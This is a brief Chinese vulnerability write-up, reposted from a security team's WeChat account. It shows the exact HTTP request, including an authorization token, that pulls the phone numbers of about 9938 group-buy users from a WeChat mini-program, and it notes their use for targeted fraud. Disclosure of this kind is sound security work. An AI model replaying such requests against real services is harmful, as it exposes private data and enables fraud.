以下为漏洞详情
数据包:
GET /zinfo/tail?initiateId=4&target=2 HTTP/1.1Host: xxxxxAccept: application/json, text/plain, */*Xweb_xhr: 1Authorization: NTc3ODU0MzRFODVGNDRENkY0NzE0MDMwREU1NTc3NERDMkYzNUU0NDNCN0E1NDRENDQ3NzZBQjgxMTA4OUEyNA==User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c33)XWEB/13487Content-Type: application/x-www-form-urlencodedSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://servicewechat.com/wx90229e983b201cf1/109/page-frame.htmlAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Priority: u=1, iConnection: keep-alive
从手机号尾数可得泄露号码为第一个拼团用户号码
9938个电话号码
由于用户均为参加拼团用户,且为未拼团成功的用户可利用这一点进行定点诈骗等添加个人信息微信。
我们是一支多元化的安全技术团队,成员活跃在渗透测试、漏洞挖掘、逆向工程等多个安全领域。日常社群氛围充满技术热情:大家会一起分析最新漏洞案例,组织内部渗透测试实战,协作开发安全研究项目。
团队定期开展技术分享会,从Web安全到二进制漏洞,从CTF解题技巧到企业级安全防护,各种技术话题都能在这里碰撞出火花。如果你也热衷于安全技术的实践与交流,欢迎加入我们一起成长!
原文始发于微信公众号(SecNL安全团队):记一次容易被忽视的功能点造成的大量信息泄露
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论